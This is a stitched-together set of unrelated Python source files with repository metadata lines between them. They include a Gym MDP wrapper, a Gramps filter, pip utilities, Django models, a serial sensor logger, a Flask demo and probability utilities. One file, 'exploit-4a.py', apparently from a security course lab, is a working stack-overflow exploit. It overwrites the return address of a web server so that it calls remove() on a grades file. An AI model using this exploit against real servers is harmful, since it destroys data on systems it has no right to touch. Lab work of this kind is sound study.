return [event]
class ELChangeMapParser(MessageParser):
def parse(self, packet):
self.connection.session.current_map = packet.data
event = ELEvent(ELEventType(ELNetFromServer.CHANGE_MAP))
event.data = {}
event.data['connection'] = self.connection
event.data['map'] = self.connection.session.current_map
return [event]
| gpl-3.0 | 5,822,827,569,618,822,000 | 38.790909 | 156 | 0.718605 | false | 3.087468 | false | false | false |
david-abel/simple_rl | simple_rl/tasks/gym/GymMDPClass.py | 1 | 2220 | '''
GymMDPClass.py: Contains implementation for MDPs of the Gym Environments.
'''
# Python imports.
import random
import sys
import os
import random
from collections import defaultdict
# Other imports.
import gym
from simple_rl.mdp.MDPClass import MDP
from simple_rl.tasks.gym.GymStateClass import GymState
class GymMDP(MDP):
''' Class for Gym MDPs '''
def __init__(self, env_name='CartPole-v0', render=False, render_every_n_episodes=0):
'''
Args:
env_name (str)
render (bool): If True, renders the screen every time step.
render_every_n_epsiodes (int): @render must be True, then renders the screen every n episodes.
'''
# self.render_every_n_steps = render_every_n_steps
self.render_every_n_episodes = render_every_n_episodes
self.episode = 0
self.env_name = env_name
self.env = gym.make(env_name)
self.render = render
MDP.__init__(self, range(self.env.action_space.n), self._transition_func, self._reward_func, init_state=GymState(self.env.reset()))
def get_parameters(self):
'''
Returns:
(dict) key=param_name (str) --> val=param_val (object).
'''
param_dict = defaultdict(int)
param_dict["env_name"] = self.env_name
return param_dict
def _reward_func(self, state, action, next_state):
'''
Args:
state (AtariState)
action (str)
Returns
(float)
'''
return self.prev_reward
def _transition_func(self, state, action):
'''
Args:
state (AtariState)
action (str)
Returns
(State)
'''
obs, reward, is_terminal, info = self.env.step(action)
if self.render and (self.render_every_n_episodes == 0 or self.episode % self.render_every_n_episodes == 0):
self.env.render()
self.prev_reward = reward
self.next_state = GymState(obs, is_terminal=is_terminal)
return self.next_state
def reset(self):
self.env.reset()
self.episode += 1
def __str__(self):
return "gym-" + str(self.env_name)
| apache-2.0 | -8,199,863,990,945,955,000 | 26.75 | 139 | 0.582883 | false | 3.603896 | false | false | false |
Forage/Gramps | gramps/gen/filters/rules/_matchessourceconfidencebase.py | 1 | 2347 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2011 Jerome Rapinat
# Copyright (C) 2011 Douglas S. Blank
# Copyright (C) 2011 Benny Malengier
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# gen.filters.rules/_MatchesSourceConfidenceBase.py
# $Id$
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ...const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from . import Rule
#-------------------------------------------------------------------------
# "Confidence level"
# Sources of an attribute of an event are ignored
#-------------------------------------------------------------------------
class MatchesSourceConfidenceBase(Rule):
"""Objects with a specific confidence level on 'direct' Source references"""
labels = ['Confidence level:']
name = 'Object with at least one direct source >= <confidence level>'
description = "Matches objects with at least one direct source with confidence level(s)"
category = _('Citation/source filters')
def apply(self, db, obj):
required_conf = int(self.list[0])
for citation_handle in obj.get_citation_list():
citation = db.get_citation_from_handle(citation_handle)
if required_conf <= citation.get_confidence_level():
return True
return False
| gpl-2.0 | 6,077,626,136,033,357,000 | 38.116667 | 92 | 0.57222 | false | 4.611002 | false | false | false |
jhayworth/config | .emacs.d/elpy/rpc-venv/lib/python2.7/site-packages/pip/_internal/utils/packaging.py | 32 | 3035 | from __future__ import absolute_import
import logging
from email.parser import FeedParser
from pip._vendor import pkg_resources
from pip._vendor.packaging import specifiers, version
from pip._internal.exceptions import NoneMetadataError
from pip._internal.utils.misc import display_path
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from email.message import Message
from pip._vendor.pkg_resources import Distribution
logger = logging.getLogger(__name__)
def check_requires_python(requires_python, version_info):
# type: (Optional[str], Tuple[int, ...]) -> bool
"""
Check if the given Python version matches a "Requires-Python" specifier.
:param version_info: A 3-tuple of ints representing a Python
major-minor-micro version to check (e.g. `sys.version_info[:3]`).
:return: `True` if the given Python version satisfies the requirement.
Otherwise, return `False`.
:raises InvalidSpecifier: If `requires_python` has an invalid format.
"""
if requires_python is None:
# The package provides no information
return True
requires_python_specifier = specifiers.SpecifierSet(requires_python)
python_version = version.parse('.'.join(map(str, version_info)))
return python_version in requires_python_specifier
def get_metadata(dist):
# type: (Distribution) -> Message
"""
:raises NoneMetadataError: if the distribution reports `has_metadata()`
True but `get_metadata()` returns None.
"""
metadata_name = 'METADATA'
if (isinstance(dist, pkg_resources.DistInfoDistribution) and
dist.has_metadata(metadata_name)):
metadata = dist.get_metadata(metadata_name)
elif dist.has_metadata('PKG-INFO'):
metadata_name = 'PKG-INFO'
metadata = dist.get_metadata(metadata_name)
else:
logger.warning("No metadata found in %s", display_path(dist.location))
metadata = ''
if metadata is None:
raise NoneMetadataError(dist, metadata_name)
feed_parser = FeedParser()
# The following line errors out if with a "NoneType" TypeError if
# passed metadata=None.
feed_parser.feed(metadata)
return feed_parser.close()
def get_requires_python(dist):
# type: (pkg_resources.Distribution) -> Optional[str]
"""
Return the "Requires-Python" metadata for a distribution, or None
if not present.
"""
pkg_info_dict = get_metadata(dist)
requires_python = pkg_info_dict.get('Requires-Python')
if requires_python is not None:
# Convert to a str to satisfy the type checker, since requires_python
# can be a Header object.
requires_python = str(requires_python)
return requires_python
def get_installer(dist):
# type: (Distribution) -> str
if dist.has_metadata('INSTALLER'):
for line in dist.get_metadata_lines('INSTALLER'):
if line.strip():
return line.strip()
return ''
| gpl-3.0 | 6,347,136,353,345,223,000 | 31.287234 | 78 | 0.68369 | false | 4.073826 | false | false | false |
IEEEDTU/CMS | Resource/models/Publication.py | 1 | 2839 | from django.db import models
from .Resource import *
class PublicationManager(models.Manager):
def addPublication(self, request):
""" add new publication """
R = Resource.objects.addResource(request)
P = Publication(
resource=R,
title=request['title'],
authors=request['authors'],
publicationDate=request['publicationDate'],
organization=request['organization'],
link=request['link']
)
P.save()
return P
def editPublication(self, request):
""" edit existing publication """
R = Resource.objects.editResource(request)
P = Publication.objects.get(resource=R)
P.title = request['title']
P.authors = request['authors']
P.publicationDate = request['publicationDate']
P.organization = request['organization']
P.link = request['link']
P.save()
return P
def getDocumentById(self, request):
""" get publication details on the basis of resource ID """
R = Resource.objects.getResourceById(request)
P = Publication.objects.get(resource=R)
return P
def retrievePublications(self, request):
""" retrieve details of all the publications depending on the request """
""" note: courseId is compulsory field; title, authors, organization, link are optional fields """
R = Resource.objects.retrieveResources(request)
P = Publication.objects.filter(pk__in=R)
if 'title' in request.keys():
P = P.objects.filter(title=request['title'])
if 'authors' in request.keys():
P = P.objects.filter(authors=request['authors'])
if 'organization' in request.keys():
P = P.objects.filter(organization=request['organization'])
if 'link' in request.keys():
P = P.objects.filter(link=request['link'])
return P
def deletePublication(self, request):
""" deletes existing publication """
R = Resource.objects.getResourceById(request)
P = Publication.objects.get(resource=R)
P.delete()
R.delete()
return P
class Publication(models.Model):
# Resource
resource = models.OneToOneField(Resource, on_delete=models.CASCADE, primary_key=True)
# Title
title = models.CharField(max_length=500, blank=False, null=False)
# Authors
authors = models.CharField(max_length=250)
# Publication date
publicationDate = models.DateField(editable=True, auto_now=False, auto_now_add=False)
# Organization
organization = models.CharField(max_length=100)
# Link
link = models.URLField()
objects = PublicationManager()
def __str__(self):
return self.title + " - " + self.authors + " - " + self.publicationDate
| mit | -3,805,081,301,058,507,000 | 34.4875 | 106 | 0.624868 | false | 4.301515 | false | false | false |
stochasticHydroTools/RotationalDiffusion | sphere/checkSPD.py | 1 | 1283 | '''Check if the new sphere mobility is positive definite for all distance'''
import numpy as np
import sys
import sphere as sph
sys.path.append('..')
from fluids import mobility as mb
from quaternion_integrator.quaternion import Quaternion
if __name__ == '__main__':
# Parameters
points = 1000
distance = sph.A * 2
orientation = Quaternion([1., 0., 0., 0.])
location = [ [0., 0., distance] ]
dd = (distance - sph.A * 0.9) / float(points)
distance = distance + dd
# Loop for distances
if(1):
for i in range(points):
distance -= dd
#print i, distance
location = [ [0., 0., distance] ]
mobility = sph.sphere_mobility(location, orientation)
data = str(distance/sph.A) + ' '
data += str(mobility[0, 0] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
data += str(mobility[2, 2] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
data += str(mobility[3, 3] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
data += str(mobility[5, 5] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
data += str(mobility[0, 4] * (6.0*np.pi*sph.ETA * sph.A**2))
print data
mobility_half = np.linalg.cholesky(mobility)
print "#END"
| gpl-3.0 | 6,660,634,305,839,014,000 | 25.183673 | 79 | 0.533125 | false | 3.129268 | false | false | false |
ZiktoTae/pyMpuFirmwareDebugger | logger.py | 1 | 5551 | #!/usr/bin/python
import sys
import serial
from serial.tools import list_ports
from mpudata import quat_packet, debug_packet, data_packet
import os
import time
import numpy as np
import matplotlib.pyplot as plt
import euclid
class mpu9150interface(object):
def __init__(self):
#self.connect()
#self.read()
print "init"
self.SIZE = 100
self.x_list = [None]*self.SIZE
self.y_list = [None]*self.SIZE
self.z_list = [None]*self.SIZE
self.mag_list = [None]*self.SIZE
self.quat_list = [None]*self.SIZE
self.accel_list = [None]*self.SIZE
self.calibrated_list = [None] * self.SIZE
self.port="null"
self.gravity = np.array([0,0,0])
def connect(self):
ports = list(self.serial_ports())
for idx,val in enumerate(ports):
print str(idx) + ". "+val
num = raw_input("Select the port for the MPU-9150 : ")
self.port = ports[int(num)]
self.s = serial.Serial(self.port , 115200 , timeout=1)
#self.ser.open()
if self.s.isOpen():
print "Connected..."
else:
self.s.open()
def send(self, str):
for i in range(0,len(str)):
self.s.write(str[i])
time.sleep(0.1)
def write(self):
command = ""
while command != "q":
command = raw_input("To Mpu>")
self.send(command)
def serial_ports(self):
"""
Returns a generator for all available serial ports
"""
if os.name == 'nt':
# windows
for i in range(256):
try:
s = serial.Serial(i)
s.close()
yield 'COM' + str(i + 1)
except serial.SerialException:
pass
else:
# unix
for port in list_ports.comports():
yield port[0]
def zeroing(self):
self.index=0
while (self.index <2 ):
self.read_debug()
#print self.index,
self.gravity = np.array([ self.data[0],self.data[1] ,self.data[2] ])
print self.gravity
def read_debug(self):
NUM_BYTES = 23
p = None
time.sleep(0.01)
while self.s.inWaiting() >= NUM_BYTES:
if self.index_accel >= self.SIZE:
break
rs = self.s.read(NUM_BYTES)
if ord(rs[0]) == ord('$'):
pkt_code = ord(rs[1])
#print "."
#print "\r"+str(pkt_code),
if pkt_code == 1:
d = debug_packet(rs)
d.display()
elif pkt_code == 2:
p = quat_packet(rs)
self.quat_list[self.index_quat] = p
self.index_quat = self.index_quat + 1
#p.display()
print "+"
elif pkt_code == 3:
d = data_packet(rs)
#d.display()
self.data = d.data
datatype = d.type
if datatype ==0:
#self.index = self.index+1
#print self.index
self.accel_list[self.index_accel] = d
self.x_list[self.index_accel] = d.data[0]
self.y_list[self.index_accel] = d.data[1]
self.z_list[self.index_accel] = d.data[2]
vec = [d.data[0] , d.data[1], d.data[2]]
vec = vec - self.gravity
norm = np.linalg.norm(vec)
norm = norm-1
self.mag_list[self.index_accel] = norm
self.index_accel = self.index_accel +1
print "-",
sys.stdout.flush()
def read(self):
self.index_quat = 0
self.index_accel = 0
print "logging..."
n=0
while( self.index_accel < (self.SIZE-1)):
self.read_debug()
print self.index_accel,
sys.stdout.flush()
self.s.close()
print "plotting..."
#plt.plot(self.mag_list)
#plt.show()
for i in range(0,self.SIZE):
#print i
q = self.quat_list[i]
d = self.accel_list[i]
if (q is not None) and (d is not None):
#if not isinstance(q,None) and not isinstance(d,None)
#print d
v = euclid.Vector3(d.data[0], d.data[1], d.data[2])
quat = q.to_q().conjugated()
#print quat
#print v
###########
q = quat*v
self.calibrated_list[i] = q
if __name__ =="__main__":
mpu =mpu9150interface()
if (len(sys.argv) == 2):
if sys.argv[1] == "setup":
mpu.connect()
mpu.write()
mpu.s.close()
else:
mpu.s = serial.Serial(sys.argv[1],115200, timeout =1)
print mpu.s
if(mpu.s.isOpen()):
print "connected..."
#mpu.s = serial.Serial("/dev/cu.usbmodemfa141",115200, timeout =1)
#mpu.read()
#raw_input("press enter to zeroing...")
#mpu.zeroing()
raw_input("press enter to start...")
mpu.read()
| gpl-2.0 | -1,227,144,257,575,223,300 | 30.185393 | 86 | 0.443344 | false | 3.833564 | false | false | false |
snakeleon/YouCompleteMe-x64 | third_party/ycmd/third_party/jedi_deps/jedi/jedi/third_party/django-stubs/mypy_django_plugin/transformers/querysets.py | 2 | 8440 | from collections import OrderedDict
from typing import List, Optional, Sequence, Type
from django.core.exceptions import FieldError
from django.db.models.base import Model
from django.db.models.fields.related import RelatedField
from django.db.models.fields.reverse_related import ForeignObjectRel
from mypy.nodes import Expression, NameExpr
from mypy.plugin import FunctionContext, MethodContext
from mypy.types import AnyType, Instance
from mypy.types import Type as MypyType
from mypy.types import TypeOfAny
from mypy_django_plugin.django.context import (
DjangoContext, LookupsAreUnsupported,
)
from mypy_django_plugin.lib import fullnames, helpers
def _extract_model_type_from_queryset(queryset_type: Instance) -> Optional[Instance]:
for base_type in [queryset_type, *queryset_type.type.bases]:
if (len(base_type.args)
and isinstance(base_type.args[0], Instance)
and base_type.args[0].type.has_base(fullnames.MODEL_CLASS_FULLNAME)):
return base_type.args[0]
return None
def determine_proper_manager_type(ctx: FunctionContext) -> MypyType:
default_return_type = ctx.default_return_type
assert isinstance(default_return_type, Instance)
outer_model_info = helpers.get_typechecker_api(ctx).scope.active_class()
if (outer_model_info is None
or not outer_model_info.has_base(fullnames.MODEL_CLASS_FULLNAME)):
return default_return_type
return helpers.reparametrize_instance(default_return_type, [Instance(outer_model_info, [])])
def get_field_type_from_lookup(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
*, method: str, lookup: str) -> Optional[MypyType]:
try:
lookup_field = django_context.resolve_lookup_into_field(model_cls, lookup)
except FieldError as exc:
ctx.api.fail(exc.args[0], ctx.context)
return None
except LookupsAreUnsupported:
return AnyType(TypeOfAny.explicit)
if ((isinstance(lookup_field, RelatedField) and lookup_field.column == lookup)
or isinstance(lookup_field, ForeignObjectRel)):
related_model_cls = django_context.get_field_related_model_cls(lookup_field)
if related_model_cls is None:
return AnyType(TypeOfAny.from_error)
lookup_field = django_context.get_primary_key_field(related_model_cls)
field_get_type = django_context.get_field_get_type(helpers.get_typechecker_api(ctx),
lookup_field, method=method)
return field_get_type
def get_values_list_row_type(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
flat: bool, named: bool) -> MypyType:
field_lookups = resolve_field_lookups(ctx.args[0], django_context)
if field_lookups is None:
return AnyType(TypeOfAny.from_error)
typechecker_api = helpers.get_typechecker_api(ctx)
if len(field_lookups) == 0:
if flat:
primary_key_field = django_context.get_primary_key_field(model_cls)
lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=primary_key_field.attname, method='values_list')
assert lookup_type is not None
return lookup_type
elif named:
column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
for field in django_context.get_model_fields(model_cls):
column_type = django_context.get_field_get_type(typechecker_api, field,
method='values_list')
column_types[field.attname] = column_type
return helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
else:
# flat=False, named=False, all fields
field_lookups = []
for field in django_context.get_model_fields(model_cls):
field_lookups.append(field.attname)
if len(field_lookups) > 1 and flat:
typechecker_api.fail("'flat' is not valid when 'values_list' is called with more than one field", ctx.context)
return AnyType(TypeOfAny.from_error)
column_types = OrderedDict()
for field_lookup in field_lookups:
lookup_field_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=field_lookup, method='values_list')
if lookup_field_type is None:
return AnyType(TypeOfAny.from_error)
column_types[field_lookup] = lookup_field_type
if flat:
assert len(column_types) == 1
row_type = next(iter(column_types.values()))
elif named:
row_type = helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
else:
row_type = helpers.make_tuple(typechecker_api, list(column_types.values()))
return row_type
def extract_proper_type_queryset_values_list(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
# called on the Instance, returns QuerySet of something
assert isinstance(ctx.type, Instance)
assert isinstance(ctx.default_return_type, Instance)
model_type = _extract_model_type_from_queryset(ctx.type)
if model_type is None:
return AnyType(TypeOfAny.from_omitted_generics)
model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
if model_cls is None:
return ctx.default_return_type
flat_expr = helpers.get_call_argument_by_name(ctx, 'flat')
if flat_expr is not None and isinstance(flat_expr, NameExpr):
flat = helpers.parse_bool(flat_expr)
else:
flat = False
named_expr = helpers.get_call_argument_by_name(ctx, 'named')
if named_expr is not None and isinstance(named_expr, NameExpr):
named = helpers.parse_bool(named_expr)
else:
named = False
if flat and named:
ctx.api.fail("'flat' and 'named' can't be used together", ctx.context)
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, AnyType(TypeOfAny.from_error)])
# account for possible None
flat = flat or False
named = named or False
row_type = get_values_list_row_type(ctx, django_context, model_cls,
flat=flat, named=named)
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
def resolve_field_lookups(lookup_exprs: Sequence[Expression], django_context: DjangoContext) -> Optional[List[str]]:
field_lookups = []
for field_lookup_expr in lookup_exprs:
field_lookup = helpers.resolve_string_attribute_value(field_lookup_expr, django_context)
if field_lookup is None:
return None
field_lookups.append(field_lookup)
return field_lookups
def extract_proper_type_queryset_values(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
# called on QuerySet, return QuerySet of something
assert isinstance(ctx.type, Instance)
assert isinstance(ctx.default_return_type, Instance)
model_type = _extract_model_type_from_queryset(ctx.type)
if model_type is None:
return AnyType(TypeOfAny.from_omitted_generics)
model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
if model_cls is None:
return ctx.default_return_type
field_lookups = resolve_field_lookups(ctx.args[0], django_context)
if field_lookups is None:
return AnyType(TypeOfAny.from_error)
if len(field_lookups) == 0:
for field in django_context.get_model_fields(model_cls):
field_lookups.append(field.attname)
column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
for field_lookup in field_lookups:
field_lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=field_lookup, method='values')
if field_lookup_type is None:
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, AnyType(TypeOfAny.from_error)])
column_types[field_lookup] = field_lookup_type
row_type = helpers.make_typeddict(ctx.api, column_types, set(column_types.keys()))
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
| gpl-3.0 | -9,191,325,024,441,455,000 | 42.958333 | 119 | 0.667773 | false | 3.812105 | false | false | false |
nmahlangu/cs263-project-one | exploit-4a.py | 1 | 1843 | #!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
# stack values
fd_addr = 0xbfffde10
return_addr = 0xbfffde0c
ebp_addr = 0xbfffde08
i_addr = 0xbfffddfc
value_addr = 0xbfffdbf4
envvar_addr = 0xbfffd9f4
# attack values
func_addr = 0x4007b170
ptr_to_file_addr = fd_addr + 0x8
file_str = "/home/httpd/grades.txt\n"
ret_addr = 0x4007b170
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + "Host: " # GET request header
req += "a" * (ebp_addr - value_addr + 4) # padding
req += struct.pack("<I",func_addr) # remove()
req += struct.pack("<I",ret_addr) # fake return address (also remove())
req += struct.pack("<I",ptr_to_file_addr) # pointer to "grades.txt"
req += file_str # "grades.txt"
req += "\r\n\r\n" # GET request suffix
return req
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
| mit | 3,121,236,461,207,966,700 | 25.710145 | 85 | 0.585458 | false | 3.129032 | false | false | false |
vcpe-io/vcpe-hub | basic_qos_control/portstatistic_monitor.py | 4 | 6280 | """Project For Port Monitor on switches."""
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.topology.api import get_switch
from ryu.controller.handler import set_ev_cls
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.lib import hub
from setting.db.data_collection import switch_stat
from setting.routing.utils.calculate_route import check_switch_load
from routing_adjustment import Routing_UpdateEvent
from setting.variable import constant
import logging
import time
import datetime
class PortStatMonitor(app_manager.RyuApp):
_EVENTS = [Routing_UpdateEvent]
"""Class for Port Monitor."""
def __init__(self, *args, **kwargs):
"""Initial method."""
super(PortStatMonitor, self).__init__(*args, **kwargs)
self.topology_api_app = self
self.monitor_thread = hub.spawn(self._monitor)
hdlr = logging.FileHandler('sdn_log.log')
self.logger.addHandler(hdlr)
def _monitor(self):
while True:
switch_list = get_switch(self.topology_api_app, None)
switch_id_list = []
for datapath in switch_list:
self._update_sw_stas(datapath)
self._request_stats(datapath.dp)
switch_id_list.append(datapath.dp.id)
target_list = check_switch_load(switch_id_list, switch_stat,
constant.load_limitation)
print'target_list', target_list, len(target_list)
if len(target_list) > 0:
ev = Routing_UpdateEvent(target_list, constant.load_limitation)
# print 'evevevevevev', ev, ev.msg
self.send_event_to_observers(ev)
hub.sleep(1)
def _update_sw_stas(self, datapath):
"""Update statistics for switches method."""
# Initialization
if switch_stat.get(datapath.dp.id) is None:
alive_ports = []
switch_stat.update({datapath.dp.id: {'alive_port': alive_ports}})
# Update active ports in list
alive_port_list = switch_stat.get(datapath.dp.id).get('alive_port')
for port in datapath.ports:
if port.is_live():
if port.port_no not in alive_port_list:
alive_port_list.append(port.port_no)
else:
if port.port_no in alive_port_list:
alive_port_list.remove(port.port_no)
if switch_stat.get(datapath.dp.id).get('stats').get(port.port_no) is not None:
p_stat = switch_stat.get(datapath.dp.id).get('stats')
p_stat[port.port_no] = None
def _request_stats(self, datapath):
"""Send PortStatsRequest method."""
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def _port_stats_reply_handler(self, ev):
"""Handle PortStatsReply from switches method."""
sw_dpid = ev.msg.datapath.id
# self.logger.info('-----------')
# self.logger.info(ev.msg.datapath.id)
# self.logger.info('-----------')
# Initialization
if switch_stat.get(sw_dpid).get('stats') is None:
switch_stat.get(sw_dpid).update({'stats': {}})
if switch_stat.get(sw_dpid).get('weight') is None:
switch_stat.get(sw_dpid).update({'weight': {}})
if switch_stat.get(sw_dpid).get('cost') is None:
switch_stat.get(sw_dpid).update({'cost': 0.0})
if switch_stat.get(sw_dpid).get('load') is None:
switch_stat.get(sw_dpid).update({'load': 0.0})
r = 0
t = 0
e = 0
for stat in ev.msg.body:
if stat.port_no in switch_stat.get(sw_dpid).get('alive_port'):
# Claculate statistics on each active port
# self.logger.info(stat.port_no)
counter_list = [stat.port_no, stat.rx_bytes, stat.tx_bytes, stat.rx_dropped, stat.tx_dropped, stat.rx_errors, stat.tx_errors, stat.collisions]
port_stat = {stat.port_no: counter_list}
p_r = 0
p_t = 0
p_e = 0
if switch_stat.get(sw_dpid).get('stats').get(stat.port_no) is not None:
his_stat = switch_stat.get(sw_dpid).get('stats').get(stat.port_no)
# self.logger.info('%s %s', counter_list, his_stat)
# self.logger.info('rx_byte %d', (counter_list[1] - his_stat[1])/1)
# self.logger.info('tx_byte %d', (counter_list[2] - his_stat[2])/1)
# self.logger.info('drop %d', (counter_list[3] - his_stat[3])/1)
p_r = (counter_list[1] - his_stat[1])/1
p_t = (counter_list[2] - his_stat[2])/1
p_e = (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
r = r + (counter_list[1] - his_stat[1])/1
t = t + (counter_list[2] - his_stat[2])/1
e = e + (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
weight_list = [p_r, p_t, p_e]
port_weight = {stat.port_no: weight_list}
# Update port statistics
sw_stat = switch_stat.get(sw_dpid).get('stats')
sw_stat.update(port_stat)
sw_weight = switch_stat.get(sw_dpid).get('weight')
sw_weight.update(port_weight)
# self.logger.info('=======')
# self.logger.info('cost function r : %d', r)
# self.logger.info('cost function t : %d', t)
# self.logger.info('cost function r-t: %d', r-t)
# self.logger.info('cost function d: %d', e)
# ts = time.time()
# st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
# self.logger.info('time %s', st)
pp = r-t
if r != 0:
# self.logger.info('cost function: %f',float(pp)/float(r))
switch_stat.get(sw_dpid).update({'cost': float(pp)/float(r)})
switch_stat.get(sw_dpid).update({'load': [r, t, e]})
| apache-2.0 | -3,953,848,409,782,491,000 | 42.013699 | 158 | 0.554618 | false | 3.52809 | false | false | false |
insua1990/DAI | DAI-master/Flask/practica2.py | 1 | 1639 | # -*- coding: utf-8 -*-
from flask import Flask,request, url_for,render_template
import mandelbrot
import random
app = Flask(__name__)
@app.route("/user/pepe")
def pepe():
return "CONTENIDO WEB ESTATICO PARA PEPE"
@app.route("/user/zerjillo")
def zerjillo():
return "CONTENIDO WEB ESTATICO PARA ZERJILLO"
@app.route("/user/<name>")
def usuario(name):
return "CONTENIDO WEB ESTATICO PARA EL USUARIO : " + name
@app.route("/mandelbrot" , methods = ['POST'])
def mand():
x1 = float(request.form['x1'])
y1 = float(request.form['y1'])
x2 = float(request.form['x2'])
y2 = float(request.form['y2'])
witdh= int(request.form['witdh'])
mandelbrot.renderizaMandelbrot(x1,y1,x2,y2,witdh,500,"static/mandelbrot.png")
image='<img src=' + url_for('static',filename='mandelbrot.png') + ' width="50%" >'
return image
@app.route("/")
def hello():
enlace='<a href=' + "http://localhost:8080/static/index2.html" + '>' + "IR A PRACTICA 2" + "</a>"
return enlace
@app.route("/svg")
def svg():
colors=['blue','black']
bucle=random.randint(1,100)
imagen='<svg height="500px" width="500px">'
for i in range(100):
forma={'1':'<circle cx="'+str(random.randint(1,500))+'" cy="'+str(random.randint(1,500))+'" r="'+str(random.randint(1,20))+'" stroke="'+colors[random.randint(0,1)]+'" stroke-width="'+str(random.randint(1,2))+'" fill="'+colors[random.randint(0,1)] +'" />'}
imagen=imagen+forma[str(1)]
imagen=imagen+'</svg>'
return imagen
@app.errorhandler(404)
def page_not_found(error):
return "Pagina no encontrada", 404
if __name__ == "__main__":
app.run(host='0.0.0.0',debug=True) | gpl-3.0 | -8,851,896,246,478,109,000 | 29.943396 | 257 | 0.639414 | false | 2.597464 | false | false | false |
deepmind/mc_gradients | monte_carlo_gradients/dist_utils.py | 1 | 2918 | # Copyright 2019 Deepmind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Distribution utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def multi_normal(loc, log_scale):
return MultiNormalDiagFromLogScale(loc=loc, log_scale=log_scale)
class MultiNormalDiagFromLogScale(tfd.MultivariateNormalDiag):
"""MultiNormalDiag which directly exposes its input parameters."""
def __init__(self, loc, log_scale):
scale = tf.exp(log_scale)
self._log_scale = log_scale
self._input_mean = loc
super(MultiNormalDiagFromLogScale, self).__init__(
loc, scale)
@property
def input_mean(self):
return self._input_mean
@property
def log_scale(self):
return self._log_scale
@property
def dist_vars(self):
return [self.input_mean, self.log_scale]
def diagonal_gaussian_posterior(data_dims):
mean = tf.Variable(
tf.zeros(shape=(data_dims), dtype=tf.float32), name='mean')
log_scale = tf.Variable(
tf.zeros(shape=(data_dims), dtype=tf.float32), name='log_scale')
return multi_normal(loc=mean, log_scale=log_scale)
def std_gaussian_from_std_dsmaxwell(std_dsmaxwell_samples):
"""Generate Gaussian variates from Maxwell variates.
Useful for coupling samples from Gaussian and double_sided Maxwell dist.
1. Generate ds-maxwell variates: dsM ~ dsMaxwell(0,1)
2. Generate uniform variatres: u ~ Unif(0,1)
3. multiply y = u * dsM
The result is Gaussian distribution N(0,1) which can be loc-scale adjusted.
Args:
std_dsmaxwell_samples: Samples generated from a zero-mean, unit variance
double-sided Maxwell distribution M(0,1).
Returns:
Tensor of Gaussian variates with shape maxwell_samples.
"""
unif_rvs = tf.random.uniform(std_dsmaxwell_samples.shape)
gaussian_rvs = unif_rvs * std_dsmaxwell_samples
return gaussian_rvs
def sample_weibull(sh, scale, concentration):
